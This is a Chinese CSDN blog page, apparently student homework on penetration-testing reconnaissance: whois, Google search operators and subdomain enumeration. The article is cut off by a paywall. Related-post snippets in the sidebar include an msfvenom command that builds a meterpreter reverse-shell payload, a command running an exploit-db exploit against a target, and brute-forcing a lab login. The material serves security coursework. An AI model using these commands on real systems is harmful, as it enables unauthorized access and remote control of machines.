网络渗透作业

最新推荐文章于 2023-12-29 14:13:58 发布
最新推荐文章于 2023-12-29 14:13:58 发布
阅读量3k 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67829282/article/details/123534097
版权
本文介绍了网络渗透测试的主要步骤,包括Whois查询以获取域名信息,利用搜索引擎搜集敏感信息,收集子域名,端口信息的扫描,指纹识别技术,以及如何判断目标是否使用CDN。还提到了社会工程学在渗透测试中的作用,强调了了解目标服务器真实IP的重要性。
摘要由CSDN通过智能技术生成

1、Whois查询

whois是一个标准的互联网协议,在whois查询中,能找到很多跟域名有关的信息,例如域名注册时间,域名所有人,一般的小型网站域名所有人是网站管理员。

常用的查询网址有爱站(https://whois.aizhan.com)站长之家(http://whois.chinaz.com)和Virus Total(https://www.virustotal.com)

2、通过搜索引擎收集敏感信息

Google是世界上最强的搜索引擎之-对一位渗透测试者而言,它可能是款绝住的黑客工具,我们可以通过构造特殊的关键字语法来搜索互联网上的相关敏感信息。如inurl:bbs 冰墩墩,冰墩墩 inurl:bbs根据文件类型搜索关键词+空格+filetype+ :+文件类型比如:专升本 filetype:DOC(搜索专插本的有关文档),专升本 filetype:pdf,info招生录取 www.zzcsjr.edu.cn

3、收集子域名信息

子域名也就是二级域名,是指顶级域名下的域名。一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迁回接近真正的目标这无疑是个比较好的选择。收集域名信息有以下常用的方法

1子域名检测工具用于子域名检测的工具主要有Layer子域名挖掘机、K8、wydomain、subDomainsBrute、MaltegoCE等

搜索引擎枚举,直

最低0.47元/天 解锁文章
.杰瑞
关注
网络渗透作业202105110124郭静
weixin_67854030的博客
03-17 4932
1.5指纹识别 指纹识别的特征:终身不变性、唯一性、方便性 本节所讲的指纹指网站CMS指纹识别、计算机操作系统、web容器的指纹识别 应用程序一般在HTML、CSS、JavaScript中多多少少会包含一些特征码,比如WordPress在robots.txt包含wp-admin、首页index.php中会包含generator=wordpress 3.xx,这个特征就是CMS的指纹,当碰到其他网站也存在此信息时,就可以快速识别出该CMS,所以叫指纹识别. 常见的指纹识别对象 CMS信息 大汉CM
网络渗透测试作业1
weixin_51561328的博客
10-11 2236
根据图片获取地理位置 例如下面的图片 1.根据商家标志,我们能够确定这是一家麦当劳店。 2.根据小票信息,可以看出“erbang Alaf restaurant”这几个关键词,使用谷歌浏览器,对其进行搜索,从搜索网页可以看到这家店是属于马来西亚的吉隆坡的一家名为Gerbang Alaf restaurant的麦当劳。 等保2.0 详细等保2.0的链接地址 等级保护 2.1基本概念 网络安全等级保护是指对国家秘密信息、法人和其他组织及公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行
网络渗透测试课作业
weixin_51939939的博客
12-13 2551
一、WinPE启动盘制作 1、什么是winpe启动盘 winpe就是一个精简的windows系统。长期的dos无界面那种系统已经无法满足当下的需求。我们需要更方便且可视化的维护系统,那么它就诞生了。 PE启动盘 其实就是一种紧急系统,可以通过设置BIOS的启动先后顺序使PE在电脑刚启动时优先引导启动,是使用工具在Windows界面下制作的一个简易的、临时的、应急用系统。 为什么这么说呢,PE系统下,可以进行备份操作,可以安装系统,但是其他的可执行程序就只有很少才能运行。 通常我们是不使用PE系统的
Web网络渗透期末作业
m0_64181446的博客
05-13 193
靶机地址:http://110.40.154.100:8000 1.在浏览器输入网址:110.40.154.100:8000 进入靶场 2.在靶机网址后边输入authenticate后进入验证 验证存在后输入网址110.40.154.100:8000/admin/ 输入用户名和密码,然后打开代理,进入爆破软件,进行抓包 3.抓包完之后把内容发到INTRUDER模块下的positions,把自动添加的变量取消 4.返回网站登录页面,直接输入用户名和密码进入 .
【实战案例】——实战渗透某不法网站
热门推荐
Demo不是emo的博客
11-21 2万+
新开了一个专栏介绍博主遇到的一些比较有意思的实战环境和渗透流程,希望对大家有所帮助
王炜炜网络渗透作业
weixin_67830340的博客
03-16 1430
1. 指纹识别 指纹由于其终身不变性、唯一性和方便性,几乎已成为生物特征识别的代名词。通常我们说的指纹就是人的手指末端正面皮肤上凹凸不平的纹线,纹线规律的排列形成不同的纹型。而本节所讲的指纹是指网站CMS指纹识别、计算机操作系统及Web容器的指纹识别等。 应用程序一般在html、js、css等文件中多多少少会包含一些特征码。 在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。 CMS(Conten...
网络渗透作业打开的网址出现ERR_INVALID_HTTP_RESPONSE怎么办
05-05
您可以尝试以下解决方法: ...4. 如果使用的是公共Wi-Fi网络,请尝试连接到其他网络或使用您自己的移动数据网络。 5. 如果以上所有方法都没有解决问题,请与网站管理员联系,可能是网站出现了故障或维护。
网络渗透作业
m0_67831325的博客
03-08 4029
1、Whois查询 whois是一个标准的互联网协议,在whois查询中,能找到很多跟域名有关的信息,例如域名注册时间,域名所有人,一般的小型网站域名所有人是网站管理员。 常用的查询网址有爱站(https://whois.aizhan.com)站长之家(http://whois.chinaz.com)和Virus Total(https://www.virustotal.com) 2、通过搜索引擎收集敏感信息 Google是世界上最强的搜索引擎之-对一位渗透测试者而言,它可能是款绝住的黑客工具,我们
2020-11-21
qq_52759179的博客
11-21 102
Copyright © 1999-2020, CSDN.NET, All Rights Reserved
高级加密解密标准AES加密secret.js代码
02-13
参考技术开发文章:【前端Js】高级加密解密标准AES加密(Javascript代码实现) ,地址http://blog.csdn.net/hj7jay/article/details/55044831
web安全大作业
09-18
web安全大作业,关于渗透测试方面,让你真正明白web安全的意义,去探索那背后的秘密。web安全找准云安全服务与解决方案提供商安全狗,全方位立体防护服务器安全.有效抗CC/抗DDOS,防黑防篡改,修复漏洞,查杀病毒,防暴力破解,全面解决安全运维难题。
国内首个!博雅辑因基因编辑疗法临床申请获CDE受理,最快60天获许可-1
m0_47891641的博客
10-28 800
今日,博雅辑因宣布中国国家药品监督管理局药品审评中心(CDE)已经受理其针对输血依赖型β地中海贫血的基因编辑疗法产品 ET-01 的临床试验申请。博雅辑因是一家以基因组编辑技术为基础,针对多种疾病加速药物研究并开发创新疗法的生物医药企业。 这是中国首个获受理的基因编辑疗法临床试验申请。 仅在过去的一年半中,至少有 11 项基因编辑研发项目在美国、欧盟进入临床开发阶段,其中有 6 项基于 CRISPR 基因编辑系统。在地中海贫血症方面,目前,利用基因编辑疗法治疗 β 地中海贫血症已成...
渗透测试作业3
qq_73604266的博客
11-16 102
例如:搜索Cisco +country:"CN"(Cisco中国地区),可以得到Cisco中国地区的相关设备信息。ZoomEye(钟馗之眼)是一个强大的网络空间搜索引擎,可以按输入搜索到各种联网设备。①与Zoomeye功能类似的搜索引擎还有那些?②利用Zoomeye进行相关搜索并截图。在线爆破目标网站子域名。
网络渗透复现作业
最新发布
2301_79000553的博客
12-29 417
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip地址 lport=端口号 -f exe -o /root/payload.exe。python2 /usr/share/exploitdb/exploits/windows/remote/38526.py 靶机ip 端口号。可输入指令load -l查询可以对靶机执行的指令 输入指令ls查看靶机桌面的文件。2、利用Nmap扫描发现靶机(Windows)运行了该服务。4.下载靶机上任意一个文件。
网络渗透课实践作业-2
m0_73942138的博客
11-15 75
是一个网络安全搜索引擎,它通过使用各种网络协议和技术来扫描和检索各种网络设备。还可以提供有关设备的基本信息,这些信息对于网络安全评估和漏洞分析非常有用。比如在zoomeye里搜索Cisco,就可以得到部分Cisco摄像头的信息。子域名可以通过搜索引擎直接查找已经爬取的子域名,比如运用搜索引擎语法site:将搜索范围限定在特定的站点中。点击相应的设备可以查看相关设备的详细信息,包括IP地址、开放端口、操作系统、软件版本以及相关漏洞。这些设备信息和相关漏洞就能够用来供他人进行安全评估和研究分析。
Spring Boot环境搭建
m0_57243505的博客
04-13 492
Copyright © 1999-2020, CSDN.NET, All Rights Reserved 打开App 1 m0_68276300 关注 Spring Boot环境搭建原创 2022-03-17 23:15:19 关注 m0_68276300 码龄0年 1.新建maven工程 2.在pom文件中添加: Spring-boot-starter-parent:可以使用spring boot框架 Spring-boot-starter-web:可以开发w...
史上最全的渗透测试面试题,都是干货。
m0_48368237的博客
01-30 7764
1、拿到一个待检测的站或给你一个网站,你觉得应该先做什么? 一、信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等。 2.通过站长之家、明小子、k8等查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3、通过DNS域传送漏洞、备份号查询、SSl证书、APP、微信公众号、暴力破解、DNS历史记录、K8 C段查询、Jsfinder、360或华为威胁情报、证书序列号获取企业域名与ip。 4.通过Nmap、Wappalyzer、御剑等查看服务器操作系统
python 中文官方手册
yygyyygy1233的博客
06-14 4536
Copyright © 1999-2020, CSDN.NET, All Rights Reserved 搜索博文/帖子/用户 2 python常用库的官方手册 原创 2019-04-09 4点赞 _沥川往事 码龄4年 关注 python 官方英文文档 https://docs.python.org python 官方中文文档 https://docs.python.org/zh-cn/ python 3.5.2 第三方中文文档 https://yiyibooks.cn/xx/python_352/inde
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

.杰瑞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值